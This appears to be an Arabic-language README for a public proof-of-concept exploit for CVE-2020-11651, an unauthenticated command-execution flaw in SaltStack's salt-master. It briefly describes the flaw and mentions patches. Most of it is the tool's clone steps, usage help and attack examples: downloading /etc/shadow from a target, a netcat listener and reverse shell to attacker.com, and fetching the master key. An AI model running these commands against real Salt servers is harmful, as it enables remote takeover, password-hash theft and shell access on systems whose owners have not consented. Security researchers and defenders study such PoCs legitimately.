
CVE-2020-11651: إثبات المفهوم
تم اكتشاف مشكلة في SaltStack Salt قبل الإصدار 2019.2.4 وقبل 3000.2. لا تتحقق فئة ClearFuncs في عملية salt-master من صحة استدعاءات الطرق بشكل صحيح. وهذا يسمح لمستخدم عن بُعد بالوصول إلى بعض الطرق دون مصادقة. يمكن استخدام هذه الطرق لاسترجاع رموز المستخدمين من خادم salt الرئيسي و/أو تنفيذ أوامر عشوائية على عمال salt.
تصحيحات لإصدارات salt غير المدعومة
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]
CVE-2020-11651 PoC
optional arguments:
-h, --help show this help message and exit
--host HOST, -t HOST
--port PORT, -p PORT
--execute COMMAND, -e COMMAND
الأمر المراد تنفيذه. الافتراضي: /bin/sh (استخدم netcat للشل العكسي)
--upload src dest, -u src dest
رفع ملف
--download src dest, -d src dest
تنزيل ملف
--minions إرسال الأمر إلى جميع العمال على الخادم الرئيسي
--quiet, -q تفعيل الوضع الصامت/الهادئ
--fetch-key-only جلب المفتاح فقط
./PoC.py --host target.com --download /etc/shadow ./shadow
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""
./PoC.py --host target.com --fetch-key-only